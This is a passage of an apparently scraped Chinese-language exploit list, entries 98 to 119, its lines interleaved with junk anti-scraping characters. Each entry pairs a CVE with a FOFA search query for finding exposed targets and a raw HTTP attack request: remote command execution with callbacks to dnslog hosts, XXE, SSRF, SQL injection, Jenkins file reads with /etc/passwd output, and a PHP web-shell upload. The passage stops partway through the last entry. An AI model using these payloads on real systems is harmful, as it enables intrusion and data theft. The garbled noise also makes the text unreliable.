, G- X. H4 Z: v) s! `! VX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
. T8 w. g: a6 a8 j# _
$ L* }; h# Q5 D. f$ \1 K. d# t+ C; _1 N4 U9 h* X& R, Z
98. SpiderFlow爬虫平台远程命令执行, V$ @# ?& r( ]2 z; }" B
CVE-2024-01950 t9 L" }5 ~4 N8 y  R. T
FOFA:app="SpiderFlow"
' T+ w2 }/ g, R3 ]: l" z/ SPOST /function/save HTTP/1.1
' c' o. _7 ?9 B1 X/ S1 L! aHost: 192.168.40.130:8088/ j8 M" d* Y# d# h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
9 K: Y& s! U5 jConnection: close
* H" l$ K) ~' b6 D/ K% }Content-Length: 1216 l: b) I. n# U1 g
Accept: */*
" S# ~9 q, |- Y2 S2 K4 E9 cAccept-Encoding: gzip, deflate. }( W8 G1 [7 [9 f! E. O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 y  n6 r# O( P' W. \7 ^$ K! b; R6 ^
Content-Type: application/x-www-form-urlencoded; charset=UTF-85 H6 Z2 C) C3 m/ s5 I
X-Requested-With: XMLHttpRequest9 c' b- k4 A- c& D% X; f" F9 g

/ D% z  k% g" ^* \1 c. K% e5 _& Mid=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
' e& [0 w0 D- p5 R4 D; G
# X) {: F3 O, s& ?; h
! ~0 n: o: R% T, b, L% s5 x99. Ncast盈可视高清智能录播系统busiFacade RCE
* m3 s* |" u% G; `& k# A( x8 NCVE-2024-0305
- Q0 }  F/ S" a" G6 V; R$ iFOFA:app="Ncast-产品" && title=="高清智能录播系统"
% K, |- C8 O* [5 [" ePOST /classes/common/busiFacade.php HTTP/1.1, p# a- P' o  c  p' P( A( K
Host: 192.168.40.130:8080+ }  v9 ^3 |- N* e8 @3 I+ y5 Q0 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
' ?- v" s# M# X; ]: T+ X; n' D0 @Connection: close" O$ g+ A1 o" F6 o2 B8 b& l; P
Content-Length: 1548 z% U) o9 U$ @1 E& M  V
Accept: */*4 z9 h6 V' Q% Y
Accept-Encoding: gzip, deflate
* }( |) f3 A6 V& y! c: HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ Y0 u  D2 a; }8 Q. p+ s
Content-Type: application/x-www-form-urlencoded; charset=UTF-82 J- l2 b, \$ f2 S
X-Requested-With: XMLHttpRequest' L# g1 M2 r( g' J( {; }
1 a( y( o9 G& ~0 m
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D1 h( D& U5 ^' F7 @% z  b3 D

* V2 `, L4 Q; v' X; _1 z$ ^: \8 u3 N% o& R
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
5 |) g6 B* g2 r, \' w/ k; aCVE-2024-0352
( i) D: ^8 [* f, G3 H6 l  wFOFA:icon_hash="874152924"
- e1 J% @8 e+ {- r7 Q6 j; hPOST /api/file/formimage HTTP/1.1
7 j! ^! X) n" P3 }& MHost: 192.168.40.130
3 U1 ]. W) e* d5 KUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
0 ^8 M9 k7 J1 I/ L1 G% a% EConnection: close4 O  q& a6 U4 ?  U$ D+ t4 x
Content-Length: 2018 {- k0 `; f- B: o' t- t
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei* p5 g7 d0 c3 i8 y2 |! J
Accept-Encoding: gzip! B0 S0 g% N6 R
$ J  u' k( A- A" c* e) R! W
------WebKitFormBoundarygcflwtei9 W+ |. z3 `% y' c" h6 s/ }
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
0 V& ]8 L, V% ^! xContent-Type: application/x-php2 k- L9 o- `; [" U1 \. m

% `7 c! f  V: [  I2ayyhRXiAsKXL8olvF5s4qqyI2O2 d. K+ a0 r" ~, e- }
------WebKitFormBoundarygcflwtei--5 f% m. K$ k; o' ]  _
0 Z7 e  b9 p) u% Z' t1 U$ s
; e) G, M7 _- m5 h3 K  s6 o
101. ivanti policy secure-22.6命令注入+ y' H1 u8 l, k6 y! G. p8 {! `) H
CVE-2024-21887, ~6 d. Z( |0 A$ I! q. Z. w# M
FOFA:body="welcome.cgi?p=logo"3 _9 y( P9 z$ ?
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
6 F% h, y, d, W$ w4 vHost: x.x.x.xx.x.x.x8 j( ?% O/ N! A4 e, j, i
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36) `* P9 `( q8 P" S3 c
Connection: close- n( G( m* J9 R4 f) `% u/ z
Accept-Encoding: gzip% F3 J' c  Y& j; t

. w% ^" V1 X$ V- h* R3 p' l1 w* q3 r/ X4 q$ l+ c& s8 {
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行% H; y9 J7 Y0 h; }2 N5 W7 s6 f2 k
CVE-2024-218935 d* L5 }. w/ h* _8 X# h) B' n" P
FOFA:body="welcome.cgi?p=logo"
* ~+ _7 p& T1 j$ k( fPOST /dana-ws/saml20.ws HTTP/1.1
3 L8 S$ ~9 ~# W, vHost: x.x.x.x
5 N% t# @8 \! u0 V- A2 L3 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" i8 R3 _2 U! [9 o6 K
Connection: close
$ ], ]# P- s8 K$ G, D! H# E6 EContent-Length: 792
# c( Q8 f+ x) b0 B. ]. YAccept-Encoding: gzip
1 j* a4 `/ p3 S
4 E5 G5 A& N" P/ h<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>
7 L! ]8 G0 r7 m; M- e3 n7 [1 W: x9 I' X* a0 G& d
103. Ivanti Pulse Connect Secure VPN XXE
! c! z2 b' I& \' n( B; _/ `CVE-2024-22024
, s9 {4 d) l. @$ X7 l, O# F9 RFOFA:body="welcome.cgi?p=logo"
8 v) s1 ?7 z* DPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
  o8 |1 B+ K3 O( `0 R) P. r2 B6 ^Host: 192.168.40.130:111
7 _" h6 N9 c) I9 X( A; ]User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36+ _/ N+ }" s; p% S/ X/ z
Connection: close. h% g- _& K( @& i. e' E$ [
Content-Length: 204/ R5 S/ L6 @" [; d. u
Content-Type: application/x-www-form-urlencoded- W9 l7 e# p1 _+ i' }1 f# e
Accept-Encoding: gzip  C" c9 ^* m1 e3 w6 T; b; p
$ p3 G; Z2 C& q
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==5 s! f6 z  Q/ J+ B; \
* n, ?& B3 H3 v" f5 M0 X; B

$ W0 a. W3 E  m& _其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
/ W2 C$ q; u" }<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>4 S( ~$ y9 T4 E3 Y9 F4 u" s
' p. L" |; q1 Z1 U5 t

( U" e6 x/ e2 H104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露2 J2 `- @! ]# [+ f& _
CVE-2024-0569  C# F5 x6 v/ H- V; {& n. S" n( j
FOFA:title="TOTOLINK"0 F+ `8 a. ^6 n# S% L+ h: V7 _3 B
POST /cgi-bin/cstecgi.cgi HTTP/1.1
' w# @4 q. s9 J, G+ ~& fHost:192.168.0.1! p% {3 A$ x( z/ F3 o6 o, D
Content-Length:41
  B1 N. J. H7 W5 H8 k8 cAccept:application/json,text/javascript,*/*;q=0.011 A( _9 P- K$ N* F: d5 k  {
X-Requested-with: XMLHttpRequest
4 d  O* c* N- xUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
4 Q1 z# v9 l( PContent-Type: application/x-www-form-urlencoded:charset=UTF-8
( c/ {8 O7 h3 |! K, HOrigin: http://192.168.0.1
4 T( g9 O0 v3 cReferer: http://192.168.0.1/advance/index.html?time=16711523805646 i& c" _) T& f* b! N! O4 g+ |5 r
Accept-Encoding:gzip,deflate* U) k0 |% S* _- z! s0 b; |/ a
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7& x! n5 L+ F4 X! a% C
Connection:close
7 W4 p0 a. @6 o, D$ \' H4 K6 ?; ?, \! k% j7 x
{# }) y0 F+ ^" G( C
"topicurl":"getSysStatusCfg",- F& ^$ v  l- i7 v- N6 s6 z
"token":""( o$ P2 |$ c6 W8 M, Y& a6 h8 O
}
& `4 s( c% r: Q/ @  Y5 z3 Z7 r
+ L$ c5 a2 r, Q) I% Q105. SpringBlade v3.2.0 export-user SQL 注入5 m3 K1 L# X8 ]: ^% C
FOFA:body="https://bladex.vip"
3 s2 D* Z' v$ s4 `http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
. E4 y& b+ p5 o) S/ Y
4 z& W+ r7 F. j106. SpringBlade dict-biz/list SQL 注入
8 T, B% [" X" q+ }% E2 ?2 y& ]FOFA:body="Saber 将不能正常工作"
% ?4 I) |' p' R9 \+ T, eGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1) ?9 v/ F% D3 u7 E
Host: your-ip
( S+ O7 F6 A5 m# O: k- nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ n+ }1 z. @; b# Q, k/ `6 H' @1 M
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A* R* i; l; Q0 h* _) q4 E& C  l
Accept-Encoding: gzip, deflate
: `+ C1 f$ F# u2 [0 g' iAccept-Language: zh-CN,zh;q=0.90 O5 ~2 N* O  n/ N8 U" [& `' m/ _
Connection: close  e8 E) H' |1 z+ s+ a4 J

3 f6 K4 |. u  [1 f1 n' k
  N6 u' `4 ~4 J1 ^# T: N107. SpringBlade tenant/list SQL 注入7 ?. h! {( t+ T# y( C9 B* M
FOFA:body="https://bladex.vip"
* p2 }! F0 m. h" cGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1  _; ^5 W) u' I6 v
Host: your-ip
: d% h- t# G$ e/ J6 B% OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; o" r5 {$ B& FBlade-Auth:替换为自己的
4 c" [1 g% Z5 }0 sConnection: close
( L+ N2 k( _  D( U3 q4 }/ F' ]7 H$ i) \2 o' x$ i
2 Z+ o7 w5 m9 I- y# m" Z
108. D-Tale 3.9.0 SSRF8 [3 `0 Z) J; w1 P# O4 f- O
CVE-2024-216421 N, p/ V7 V( }* m- ?
FOFA:"dtale/static/images/favicon.png"9 u) {  t# M' O& ?
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
1 l3 d7 u& H; @' ^6 L7 s7 |4 sHost: your-ip
- Q! @* X3 k& H0 |; wAccept: application/json, text/plain, */*! ~7 g$ ~: }8 c# [( Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
% e! [) C, R0 f& B: j& {Accept-Encoding: gzip, deflate
6 Q. H( J& B" }/ m" l6 }/ aAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
2 }3 h6 G+ k% N& UConnection: close- M; ^* h- `7 P! W2 \, k" h
3 J8 C: B# D2 L: _5 H  Y

8 f/ {& y! f: K. V, O* m, i109. Jenkins CLI 任意文件读取
' X6 q' y, G: u* sCVE-2024-23897
. x7 D4 t% j) _! |FOFA:header="X-Jenkins"+ S1 f' b- Q9 V- W7 A
POST /cli?remoting=false HTTP/1.1
6 U3 d! `+ z' m# z9 ?Host:! }( E* [8 l6 f* i6 s
Content-type: application/octet-stream4 T! a5 I3 n) Z6 V5 M+ W
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
8 n* R! }$ l2 U' U8 G1 CSide: upload7 j! K3 n; P; Z5 e3 Y# _/ r/ G
Connection: keep-alive2 S. w$ `( c- I  J* ?
Content-Length: 1637 Y! v; k5 o% z9 B# }
* q! X; m. P/ F+ h& {6 U
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'; P: P, s( S3 L# c
2 k" Q, U5 b5 F1 d# U' t

9 V' _$ m! W3 p0 W4 {POST /cli?remoting=false HTTP/1.1
5 G" e8 b. i" |! i6 e) A' fHost:* y* _7 h  r% a% [1 {
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
; ]4 E* O1 x' v3 F9 x0 }download8 j2 v5 o5 b( x3 U. h
Content-Type: application/x-www-form-urlencoded
) ]) s5 }% V$ wContent-Length: 09 d& S" A8 C6 q. L1 H% v
% N" X9 O& e+ Z! |
9 D. H3 F2 C4 c% n$ H
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
) w3 T* z/ I$ y: ~: rjava -jar jenkins-cli.jar help
6 U( \! C$ T! H$ D( R7 Q6 |[COMMAND]
1 q% m. S  S2 k+ W$ c: L- L$ QLists all the available commands or a detailed description of single command.
' g3 J% F$ [8 M; j COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)7 g$ E8 q% q" n1 \( I
8 ^: k6 A3 w! K% I# |

- M1 I# I1 D& D  m110. Goanywhere MFT 未授权创建管理员/ b( y; _& L! B9 R, y* q+ g
CVE-2024-02045 i, q- x* M2 D  Q
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
1 O3 S8 b; F' A; ~( AGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
- r- J( \& U5 g9 z+ z; r* kHost: 192.168.40.130:8000
; g0 n" ?4 a( S- c5 Z6 _User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
! I' N) ~- U& B/ [Connection: close
& q0 u. X( \5 F1 Z( DAccept: */*
( z9 _/ o* w9 `' SAccept-Language: en% O' F7 S4 T1 f7 @: A
Accept-Encoding: gzip
+ T, Q; w0 l9 X! o" E
8 C; M3 w* X# X! W  T( m
+ F5 Y! b+ n% {111. WordPress Plugin HTML5 Video Player SQL注入# q8 F& q' l, H) b. ]- R  i% y
CVE-2024-1061' ^8 z* m  E+ W! \7 V4 `
FOFA:"wordpress" && body="html5-video-player"% l4 s$ B; q1 Y, J- b) t' p3 g/ ?( P
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.16 V; e2 M, ~* }) T0 N+ h  v# z9 q
Host: 192.168.40.130:112
) e# R' d; r2 ?+ o. o  e0 xUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36. n. {. j% j. {! C4 l( \! a, m9 b
Connection: close
1 h& n7 v! x+ n9 FAccept: */*+ }5 O; q8 `3 @: n4 k8 q7 m
Accept-Language: en
% c5 O2 O) |+ j- WAccept-Encoding: gzip
  M2 D* H% m! F' e  R( L+ b
+ ]% Q. S) n* V( ~7 c: z5 {9 ]: h+ X- `* z$ ^7 y; K& ~( K1 s
112. WordPress Plugin NotificationX SQL 注入& M1 U8 C+ n( w, F
CVE-2024-16982 D* m" ?6 a; j* h4 ]9 @% U0 s
FOFA:body="/wp-content/plugins/notificationx"
" h7 }6 f/ A7 s9 p- q  m% SPOST /wp-json/notificationx/v1/analytics HTTP/1.1) }  W. g' X: l$ H
Host: {{Hostname}}0 m* ]6 Y) F; C3 _8 j0 D
Content-Type: application/json& T: @, D/ {# S" p8 r: w+ K
5 Z  E2 D8 V  t' D1 T+ B  c7 k
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}/ B. r" ?9 S* O4 s

& r+ \  T9 U/ x. p7 x9 q
/ M5 v# ?7 _% W) K% V113. WordPress Automatic 插件任意文件下载和SSRF. Y1 i# u4 k$ G* d
CVE-2024-27954* {# p# E& j1 e/ K2 F: H. N0 o
FOFA:"/wp-content/plugins/wp-automatic"
0 V/ l( B- i% d9 `* k/ S8 Z4 hGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
* a% b& i6 b7 qHost: x.x.x.x
+ Y# V/ O% a% |# A- ?' MUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.369 [. j# L3 U! ?- ^" k7 O* V; w
Connection: close
/ v( q* S8 P( tAccept: */*( d9 ]/ ]! q5 s2 t1 c3 r
Accept-Language: en
8 x- P$ A5 G+ B8 F6 Q3 l: |, YAccept-Encoding: gzip. x) [: P6 V. O+ W2 ?
% S7 [! Q. s- {: w8 D

9 ?: s( S9 s1 n114. WordPress MasterStudy LMS插件 SQL注入
( z+ v: w7 [7 jFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
- p* q" C4 r  u( h( R* \GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
1 Y; Q* q( a; Y2 B- T5 [! Z& NHost: your-ip
5 x8 _5 B# G4 f% CUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.363 H) o: K7 ]% }. x
Accept-Charset: utf-8# X6 ~; k* Q0 X; f( `
Accept-Encoding: gzip, deflate1 _1 b& a; B6 Z5 p5 Y2 r/ W
Connection: close
- q2 O+ f& Q) W# S. j: u
! i( `+ a2 z9 K. h/ E5 v2 l; N3 R
" I3 }5 Q  m3 \' g# N- V6 d115. WordPress Bricks Builder <= 1.9.6 RCE- Y9 C: H/ l- J7 U7 Q2 s' Y$ t
CVE-2024-25600
. b+ D& i$ V# n" ~, r- {FOFA: body="/wp-content/themes/bricks/"4 U2 F3 Y& X" n# x
第一步,获取网站的nonce值6 j0 h/ X" n7 |' K: H7 Y
GET / HTTP/1.1+ h- r7 |8 [6 T0 B2 ]1 n, k7 \
Host: x.x.x.x, h9 |- ^$ }! _+ l
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
7 R& N. O' s* S9 ^( @2 X6 o0 yConnection: close
/ \3 J8 e$ u; Z5 YAccept-Encoding: gzip
6 M- x1 \) v( A% z. z7 |- P" B1 \5 i0 H% `" O) p& D& J# v
0 {; I7 }* x; R% O
第二步替换nonce值,执行命令
8 I( N) w5 J; u. s7 N+ \9 x6 uPOST /wp-json/bricks/v1/render_element HTTP/1.1
) K6 E, ~( H0 E0 X- X$ kHost: x.x.x.x1 T( {% D% S( q( |& `$ A; ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36( R( C) c, ^; H6 ]) t7 j8 z* `
Connection: close
, _& z( G# P' d+ c6 u- s# wContent-Length: 3568 P& J; j& X" W& x7 |0 Q4 s2 S
Content-Type: application/json
' S# s% `1 m* V/ E) y$ z7 lAccept-Encoding: gzip
  S2 H4 L3 r* j* p: q) F2 Q' y$ w/ H/ `2 ?0 @/ t4 ~" R( t
{7 J3 e! u/ S' m. h, T3 ^
"postId": "1",
7 H+ e% E4 A4 a/ }) U5 Q  "nonce": "第一步获得的值",( d8 F  W1 C: D  |3 l0 S
  "element": {" j2 u/ E; m  ~- P
    "name": "container",/ K& n3 e' `  W- S
    "settings": {: ]6 h  C8 L" G4 B
      "hasLoop": "true",
, P0 J5 E' k& O      "query": {
% ?5 p+ b$ p1 b: h4 R        "useQueryEditor": true,$ N% Q8 b. E5 P
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
& D, I7 `7 @7 }% U( {& r$ l7 p        "objectType": "post"
+ D: r! b: \- V' M% K  E* v      }
2 i% X; k8 n; l    }" H, ~( t- d6 l6 {1 F. W: D+ @( J
  }2 S! y# J* t# n& T/ s# _: x
}& L1 e$ c7 f6 O, ~7 I

6 T% w- q, i, v$ C1 ?0 Y+ t: i3 m3 x! Y8 P% x& T7 x, ~' \- C% W% e
116. wordpress js-support-ticket文件上传
- J! v! P& }" ~# U0 [" wFOFA:body="wp-content/plugins/js-support-ticket"
+ J3 W; \4 h; p# w1 x9 V# w2 mPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.13 n4 v( z1 i1 ^2 D! g
Host:
' C2 r0 [" V1 n" \2 q. J- {' P) bContent-Type: multipart/form-data; boundary=--------767099171
1 ?1 ~, L3 L& t0 bUser-Agent: Mozilla/5.0* T8 U8 Z! ]) k

, w% q/ l4 o7 d9 L----------767099171( M2 v! u- R( C1 G( ?1 _( Y
Content-Disposition: form-data; name="action"
, K2 Z6 k. A) e5 aconfiguration_saveconfiguration
+ r: o6 A$ \! Y9 F: q1 z* X----------767099171
/ V6 E' c, s5 Y0 @0 cContent-Disposition: form-data; name="form_request"
$ ~: b% I, `: |0 Zjssupportticket
6 L; m& w" ~5 ~  q% p. X' T----------7670991712 Y  u' y. L  q& x0 `1 R; W
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
& b: S: t/ N( ?1 J! [Content-Type: image/png6 S7 a$ `- C5 n
----------767099171--$ F) X& {1 G) h1 u, S  n. ^# l

8 b5 ?/ M2 L: h% H
0 {! I( e( p  D. Q/ j9 t' K117. WordPress LayerSlider插件SQL注入
3 K# y" x( S& [version:7.9.11 – 7.10.0& R/ m+ y% k+ V" k3 Y0 K5 ?4 S
FOFA:body="/wp-content/plugins/LayerSlider/"
7 L3 h- ^- B8 i* G: U6 DGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.16 L# Y) Y7 o2 i! [8 K
Host: your-ip
1 N6 i8 a, I% v- w5 ]# _" A  A; BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0; m1 _$ j4 g  R' w5 B; \8 D) J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 p1 |, ^8 H1 VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 h6 Y. e2 ~% q
Accept-Encoding: gzip, deflate, br, B  j+ S+ n, @
Connection: close) t( u: Y% t5 O9 T- v
Upgrade-Insecure-Requests: 1
: k5 l) t: q" q* o5 Y6 V5 n5 c
& D7 b, ?8 |4 k( h$ c0 Z0 i
7 e* C# O. i/ M# j, h/ [; i118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
. `" A6 v: q5 p" `/ O0 w2 }* S( ICVE-2024-0939, k, K- U, E# E% k
FOFA:title="Smart管理平台"0 G2 {' d! W: u0 `: i( h
POST /Tool/uploadfile.php? HTTP/1.1& W: P) l( C2 N
Host: 192.168.40.130:8443
; U: m: S4 G5 {2 S0 V6 k/ w5 OCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8; K6 w: V1 J% E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.01 h0 M8 S# K7 W0 R1 E! w" ]% o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ ?7 D; X9 }0 ~& q0 @5 rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ ^8 a% ^+ J; L) F$ O
Accept-Encoding: gzip, deflate
+ D8 I: ~6 P) Q1 l: jContent-Type: multipart/form-data; boundary=---------------------------139797012227476466340371828874 O+ Q- @2 q. u  u. f4 @
Content-Length: 4051 W6 Y+ T, f. d5 _
Origin: https://192.168.40.130:8443
, U  W. T% O1 L( [Referer: https://192.168.40.130:8443/Tool/uploadfile.php. b% X, r/ n$ C/ C8 G# A! B
Upgrade-Insecure-Requests: 16 d# ?. B0 r. |7 Y  O
Sec-Fetch-Dest: document  E5 p  w8 B( p: _! S
Sec-Fetch-Mode: navigate8 V  `/ i" q: b0 S" u' v7 C' i
Sec-Fetch-Site: same-origin9 i8 V* p4 C- D+ q' B- h" k
Sec-Fetch-User: ?1: K, `7 c0 l8 I, j3 h8 ?
Te: trailers6 D( @( N. u: |6 |0 y% o
Connection: close! ^; o" y2 y8 e  R

* A  u1 ?- K  z$ s' v+ m-----------------------------13979701222747646634037182887
1 Q# V; G9 \3 R: @! P* _' [" }1 cContent-Disposition: form-data; name="file_upload"; filename="contents.php"
+ m( E$ S. Q5 Q. y# ^0 wContent-Type: application/octet-stream1 \# x9 q& H. {/ a9 X( @, S
- v) U& ], G& [( @0 k
<?php2 t- ^) r& L& s1 N; l- L/ B6 Q% q; s
system($_POST["passwd"]);, a/ W) w$ ?8 _" j; S
?>4 I5 `+ L2 Y! H  Q0 k
-----------------------------13979701222747646634037182887! H$ `6 {; Y, S+ \  ~' }
Content-Disposition: form-data; name="txt_path"5 Y. V9 _: |) p; [
8 t/ k1 l9 W2 }' k. ], M
/home/src.php
& G% q$ u( z; q' H9 N-----------------------------13979701222747646634037182887--
+ A/ r) c. n. I9 n
- e- [! j! a" `) ?" [9 ^) Y7 f( l/ g
访问/home/src.php/ u7 L0 y! Q8 L

8 T' q* J, m. ^( s- y  Q+ N119. 北京百绰智能S20后台sysmanageajax.php sql注入
* B5 N* s& H9 R$ sCVE-2024-1254
6 j  |& [/ f* D3 O' P7 |& z, F& BFOFA:title="Smart管理平台"
4 ^% P' g& f! V先登录进入系统,默认账号密码为admin/admin# k; x1 z+ f7 G+ m- l6 P, i
POST /sysmanage/sysmanageajax.php HTTP/1.11
7 a3 h( A- r0 X+ B) k0 NHost: x.x.x.x
) x  a1 v3 Q0 i2 B, N1 aCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
